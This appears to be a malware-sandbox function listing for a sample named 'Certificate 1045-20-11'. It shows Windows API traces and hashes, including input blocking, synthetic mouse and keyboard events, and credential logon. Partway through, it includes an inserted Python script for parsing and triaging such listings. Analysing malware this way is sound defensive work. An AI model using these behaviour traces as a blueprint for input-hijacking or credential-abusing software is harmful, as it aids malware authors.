• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00887223
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0088723A
• FreeSid.ADVAPI32(?), ref: 0088724A
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
                                                                                • Opcode ID: c539e588a28e9269fa531e16fe112600367d10e7c0d597b2cb2495483d90552a
                                                                                • Instruction ID: 6df81ddc7c43b38b53c8d98de7ad8f07022701b049ea8fe8b9c8fbaebbe81de1
                                                                                • Instruction Fuzzy Hash: 33F01275904309BFDF04DFE8DD89EEDBBB8FF08201F104469A502E2191E37096458B10
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0088F599
                                                                                • FindClose.KERNEL32(00000000), ref: 0088F5C9
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID:
                                                                                • API String ID: 2295610775-0
                                                                                • Opcode ID: da46928ef611cb125535f0f0b3e0d420ac4ab3bee2946582dbe2c5557cf1a5db
                                                                                • Instruction ID: bc7d74b2c460b6127ae0ca174803285716898afe084dc65dd9ed3853011d6027
                                                                                • Instruction Fuzzy Hash: 1C11A1316002049FDB10EF28D845A2EF3E8FF85325F04892EF9A6D7291CF30AD048B81
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0089BE6A,?,?,00000000,?), ref: 0088CEA7
                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0089BE6A,?,?,00000000,?), ref: 0088CEB9
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                • Opcode ID: 7645eb9ec7e0eeb7329f83cfec250a50facfcc2b91d9ecacbeaf1e64c48bc500
                                                                                • Instruction ID: a869c6346f1f6f7e657d0c886ec35bda16c3fa4c4af3e56c40b784173671fa26
                                                                                • Instruction Fuzzy Hash: 40F08C3110032DABDB20ABA4DC49FEA776DFF083A1F008165F919E6181D730AA40CBA1
                                                                                APIs
                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00884153
                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00884166
                                                                                Similarity
                                                                                • API ID: InputSendkeybd_event
                                                                                • String ID:
                                                                                • API String ID: 3536248340-0
                                                                                • Opcode ID: ae0525b411ec149e0121ac0777a4d2ee997a8235f1460162ff5ba83841224a0c
                                                                                • Instruction ID: 79c767278a3295874ff6289486dd15c3c70dd178acb0c17ee0e1c81d9c9fc2f9
                                                                                • Instruction Fuzzy Hash: 59F06D7590034EAFDB059FA0C809BBE7BB0FF00305F008019F96596191D77986129FA0
                                                                                APIs
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0087ACC0), ref: 0087AB99
                                                                                • CloseHandle.KERNEL32(?,?,0087ACC0), ref: 0087ABAB
                                                                                Similarity
                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                • String ID:
                                                                                • API String ID: 81990902-0
                                                                                • Opcode ID: 627a51ba4073d2cca2d8dcd953a5c6d5ea4ebf86c7b67d101561b6428af4ed1e
                                                                                • Instruction ID: 76337eb93c4fa1d0f2df9ef7d8ee86ba96d6d73203c72d2c72231c1db19b472d
                                                                                • Instruction Fuzzy Hash: 2FE0BF72000A10AFE7252F69EC05D76B7A9FB443227108439B959C1471D772AC949B51
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00866DB3,-0000031A,?,?,00000001), ref: 008681B1
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008681BA
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 838dbbcf10260a2bf9e7b5bfd009bcadbdc6178954f4bce21418abad6ea8a3a5
                                                                                • Instruction ID: ecaf942eaa93a5b136916ede07bcf402f0e78cc78782a55ba961c9c2c2985e80
                                                                                • Instruction Fuzzy Hash: D7B09231044748ABDB003BB1EC09F587F78FB48656F018021F60D48661AB7254108A92
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: f716d138754001ff8ad251ecf22d1abdcfdf537265233642ef0b4ede0893cfe9
                                                                                • Instruction ID: 4446438429fc96e336f541b0d3b7a5133b12f46439cc94a524f7b43ea3a43094
                                                                                • Instruction Fuzzy Hash: A9A22974A04219CFDB24CF58C880BADBBB1FF59314F2581AAD859EB391D7349E81DB90
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8b1f90e1cc12f1eceddd768b7552c1b9ed8f1b520796986c45787b60ca4ecf9
                                                                                • Instruction ID: 2542da5acc603c6f82790dfb664c41d0271757f86526c0f9bfcd9c01cd3f85bf
                                                                                • Instruction Fuzzy Hash: E0320222E29F414DD7239635C822335A799FFB73D4F16D737E819B5AAAEB28C4835100
                                                                                Similarity
                                                                                • API ID: __itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 674341424-0
                                                                                • Opcode ID: a89981784a82ff656c886cc4de915988b65f43bc8080e597d238e8d3a0201784
                                                                                • Instruction ID: 7804c2d1c96cb4b33d4dfca8aee5e265d16817618bb795e3fd047f56e29b1af0
                                                                                • Instruction Fuzzy Hash: A92254716083199BD724DF28C891BABB7E4FB84314F10492DF99ADB291DB71E944CB82
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 09f73ae16d65f476a7050e3bc8a63aadf2dc5248546b94d097ea9a2992226944
                                                                                • Instruction ID: b5212b6067fbaf707efbd310eac9cc28b122efd8b949f11e10d3a6c94835d0db
                                                                                • Instruction Fuzzy Hash: 4BB1CF20D2AF414DD62396398871336BB5CBFBB2D6F91D71BFC2A74D66EB2185834180
                                                                                APIs
                                                                                • __time64.LIBCMT ref: 0088B6DF
                                                                                  • Part of subcall function 0086344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0088BDC3,00000000,?,?,?,?,0088BF70,00000000,?), ref: 00863453
                                                                                  • Part of subcall function 0086344A: __aulldiv.LIBCMT ref: 00863473
                                                                                Similarity
                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                • String ID:
                                                                                • API String ID: 2893107130-0
                                                                                • Opcode ID: d953670e32e2ea860a57c64e9cf5e6a6f3ea390fb7a5b51ffefa671558129b3b
                                                                                • Instruction ID: b5028a7bbc77634853a0ddaad837c286721ccb47b60bdba0d27a0eb8db21d40c
                                                                                • Instruction Fuzzy Hash: 9F21AF726346108FC729CF38C881A92B7E5EB95310B648E7DE0E5CB2C0CB74BA05DB54
                                                                                APIs
                                                                                • BlockInput.USER32(00000001), ref: 00896ACA
                                                                                Similarity
                                                                                • API ID: BlockInput
                                                                                • String ID:
                                                                                • API String ID: 3456056419-0
                                                                                • Opcode ID: a5006d955eead93a1e00d66b4f88e4fe3626b0e14cdae52cbc09937845011878
                                                                                • Instruction ID: d93fb8a1ffe0ea37ca0d3264369b6e934bd2806f4ce452e77832a776f55db88d
                                                                                • Instruction Fuzzy Hash: 81E012352002146FCB00EB59D804D56B7ECFFB4751B04C426F945D7251DAB4F8048B91
                                                                                APIs
                                                                                • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008874DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: mouse_event
                                                                                • String ID:
                                                                                • API String ID: 2434400541-0
                                                                                • Opcode ID: 50248b0e287794b24c9716c9844162c541f8feebf367f37e83979e0e735669cc
                                                                                • Instruction ID: 7d5694b7ca3bf42fa82017995d2baebd06dcb3ce04bd1c44c9dbf4fbe3bd5702
                                                                                • Opcode Fuzzy Hash: 50248b0e287794b24c9716c9844162c541f8feebf367f37e83979e0e735669cc
                                                                                • Instruction Fuzzy Hash: A9D05EA016C30938EC6837248C0FF760D28F3017C4FB081E9B082C94C3F890D841933A
                                                                                APIs
                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0087AD3E), ref: 0087B124
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LogonUser
                                                                                • String ID:
                                                                                • API String ID: 1244722697-0
                                                                                • Opcode ID: 48cfd918e7067e66ac069505eef778b326c1b4c721c2b0a30cc92927467f274a
                                                                                • Instruction ID: 8757103319329120667fb9d0815cc1f7904222b4f71d1066e8636dbb3ca70232
                                                                                • Opcode Fuzzy Hash: 48cfd918e7067e66ac069505eef778b326c1b4c721c2b0a30cc92927467f274a
                                                                                • Instruction Fuzzy Hash: FBD09E321A4A4EAEDF029FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: NameUser
                                                                                • String ID:
                                                                                • API String ID: 2645101109-0
                                                                                • Opcode ID: ebdc879eb1318388d61fecdf886dbadd1d22f9144c0daa2ffc16526404ca6b94
                                                                                • Instruction ID: 689bc3d3525823306dec235fafe7b38f44347a1963462a592c1a434df8a63986
                                                                                • Opcode Fuzzy Hash: ebdc879eb1318388d61fecdf886dbadd1d22f9144c0daa2ffc16526404ca6b94
                                                                                • Instruction Fuzzy Hash: E5C04CB140050DDFC755DBC4C944DEEBBBCBB04305F1050919105F1110D7709B459B72
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0086818F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 30796b7edfd96af69acf50c89bfde2854711e0316897a6bf1feb3e1821f045be
                                                                                • Instruction ID: a613100d782e594a8b8e828e96eb881bd19036f0d814a7d5e8852b85090e61a0
                                                                                • Opcode Fuzzy Hash: 30796b7edfd96af69acf50c89bfde2854711e0316897a6bf1feb3e1821f045be
                                                                                • Instruction Fuzzy Hash: B5A0113000020CAB8F002BA2EC088883F2CFA002A0B008022F80C00A20AB32A8208A82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e2d585505c69018b3565f2fe3916863596593409d13c0023fffaad8770136806
                                                                                • Instruction ID: deb377362b1dbcca69eeda4f3763d678e9630b072c4543e30df3ee1ae404a851
                                                                                • Opcode Fuzzy Hash: e2d585505c69018b3565f2fe3916863596593409d13c0023fffaad8770136806
                                                                                • Instruction Fuzzy Hash: 4F22BC7090421ECFDB24DF58C480AAEB7B0FF58314F15816AE98ADB351E735AD85CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ca7b02fcbccfdf110168a9c5300abbba33a7debd2790397e4e2163ed9f546928
                                                                                • Instruction ID: 11fd3d23e129d07fe9e72c902e9a7ed4ee5dd352beede955093f482cfe86e915
                                                                                • Opcode Fuzzy Hash: ca7b02fcbccfdf110168a9c5300abbba33a7debd2790397e4e2163ed9f546928
                                                                                • Instruction Fuzzy Hash: 67129A70A0020DAFDF14DFA8D981AEEB7F5FF48300F208569E846E7254EB35A925CB55
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3728558374-0
                                                                                • Opcode ID: a0c6e9aaf037e4a29f83a8165327f14fee073148ffac02a2e7f62d929a943f35
                                                                                • Instruction ID: 7d55d480b70e98df8a0412a2c088c9dde45d7f511b9e7b5c45db5383b2acd78e
                                                                                • Opcode Fuzzy Hash: a0c6e9aaf037e4a29f83a8165327f14fee073148ffac02a2e7f62d929a943f35
                                                                                • Instruction Fuzzy Hash: 52029F70A00209DFCF14DF68D991AAEBBB5FF48310F148469E806EB355EB35DA15CB92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction ID: 17c95b87870c28f89f6b1e3f7226303c47df8bb4caf1fa3b6cfcee9c7599e893
                                                                                • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                • Instruction Fuzzy Hash: D1C194322051930ADF2D4639D43543FBAA1EAA17B631B076DD8B3CF5D6EF20D528DA24
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction ID: ceca956445032a6bf0e87498538d9809794ea6e599c23aec0cc8ce8601bfa3eb
                                                                                • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                • Instruction Fuzzy Hash: 70C1A53220519309DF2D4639943553FBAA1EAA27B631B076DD8B3CF5D6EF20D528DA20
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction ID: ad0d9258352c617e2cc0871504e32c716460b15bf0dcb2ab37dee9684c5c54e8
                                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                • Instruction Fuzzy Hash: 2DC195322051930ADF2D4639943553FBAA1EAA27B631B077DD8B3CF5D6EF10D528DA20
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction ID: c7fecac08b0a6078a47ff8e1d17bca0a4ccacb8f2a02eda972cb3c95910fdb6b
                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                • Instruction Fuzzy Hash: C4C181322050A709DF2D4639943543EBAA1AAA17B631A077DDDB2CF5D7EE20D52CD620
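                                                                                The "APIs" bullets in this function view (mouse_event, LogonUserW, SetUnhandledExceptionFilter, and the window-and-picture routine that follows) share one fixed line format: API name, module, optional argument list, and the call-site address after "ref:". The following script is an added example, not part of the Joe Sandbox report or of its tooling, showing how an analyst can pull those references out of a saved report and triage them: it parses the bullet lines, groups call sites under a small hand-written behaviour table, and names a few well-known Win32 constants (the 0x2 passed to mouse_event and the 0x172 passed to SendMessageW). The behaviour labels, the constant table, and the sample listing are this example's own constructions; the sample lines mirror entries visible in this view.

```python
"""Extract API-call references from a Joe Sandbox function listing (added example).

Parses bullet lines under an "APIs" heading, e.g.
    • mouse_event.USER32(00000002,00000000,...), ref: 008874DE
    • DestroyWindow.USER32 ref: 0089A31E
and tags the API names against a small hand-written behaviour table.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Tuple

# Name.MODULE, optional (arg,arg,...), then "ref: <hex call-site address>".
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[str]   # raw argument text; '?' means the sandbox could not resolve it
    ref: int          # address of the call instruction


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return every API reference in `text`, in listing order; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings, hashes, memory-dump sources, etc.
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# Behaviour labels are this example's own wording, not Joe Sandbox signature names.
BEHAVIOURS: Dict[str, str] = {
    "BlockInput": "blocks mouse and keyboard input",
    "mouse_event": "synthesizes mouse input",
    "LogonUserW": "logs on with explicit credentials",
    "SetUnhandledExceptionFilter": "installs a top-level exception filter",
    "IsDebuggerPresent": "checks for a debugger",
    "CreateStreamOnHGlobal": "builds an in-memory stream",
    "OleLoadPicture": "decodes a picture from a stream",
}

# Hand-decoded Win32 constants for a few (API, 0-based argument index) positions.
KNOWN_CONSTANTS: Dict[Tuple[str, int], Dict[int, str]] = {
    ("mouse_event", 0): {0x0002: "MOUSEEVENTF_LEFTDOWN", 0x0004: "MOUSEEVENTF_LEFTUP"},
    ("SendMessageW", 1): {0x0172: "STM_SETIMAGE"},
}


def summarize(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Group call sites (as API@address) by behaviour label; untagged APIs are dropped."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for c in calls:
        label = BEHAVIOURS.get(c.api)
        if label:
            hits[label].append(f"{c.api}@{c.ref:08X}")
    return dict(hits)


def decode_constants(calls: List[ApiCall]) -> List[Tuple[str, int, str]]:
    """Name known numeric arguments, e.g. the 0x172 passed to SendMessageW is STM_SETIMAGE."""
    named: List[Tuple[str, int, str]] = []
    for c in calls:
        for (api, idx), table in KNOWN_CONSTANTS.items():
            if c.api != api or idx >= len(c.args):
                continue
            try:
                value = int(c.args[idx], 16)
            except ValueError:      # '?' or a string literal such as 'AutoIt v3'
                continue
            if value in table:
                named.append((c.api, c.ref, table[value]))
    return named


# Constructed sample in the report's format; the lines mirror entries shown in this view.
SAMPLE_LISTING = """\
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008874DE
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0087AD3E), ref: 0087B124
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0086818F
• DestroyWindow.USER32 ref: 0089A31E
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A4D8
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,008CD9BC,00000000), ref: 0089A5B9
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0089A60E
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LISTING)
    for label, sites in summarize(calls).items():
        print(f"{label}: {', '.join(sites)}")
    for api, ref, name in decode_constants(calls):
        print(f"{api} @ {ref:08X}: {name}")
```

                                                                                Feed it the text of a saved report page and the regex ignores everything that is not an API bullet, so the hash and dump-source lines above pass through harmlessly. Arguments that Joe Sandbox could not resolve are rendered as "?", and string arguments such as the window title keep their spaces because the split is only on commas; both are left as raw text and skipped by the constant decoder.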
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 0089A2FE
                                                                                • DeleteObject.GDI32(00000000), ref: 0089A310
                                                                                • DestroyWindow.USER32 ref: 0089A31E
                                                                                • GetDesktopWindow.USER32 ref: 0089A338
                                                                                • GetWindowRect.USER32(00000000), ref: 0089A33F
                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0089A480
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0089A490
                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A4D8
                                                                                • GetClientRect.USER32(00000000,?), ref: 0089A4E4
                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0089A51E
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A540
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A553
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A55E
                                                                                • GlobalLock.KERNEL32(00000000), ref: 0089A567
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A576
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0089A57F
                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A586
                                                                                • GlobalFree.KERNEL32(00000000), ref: 0089A591
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0089A5A3
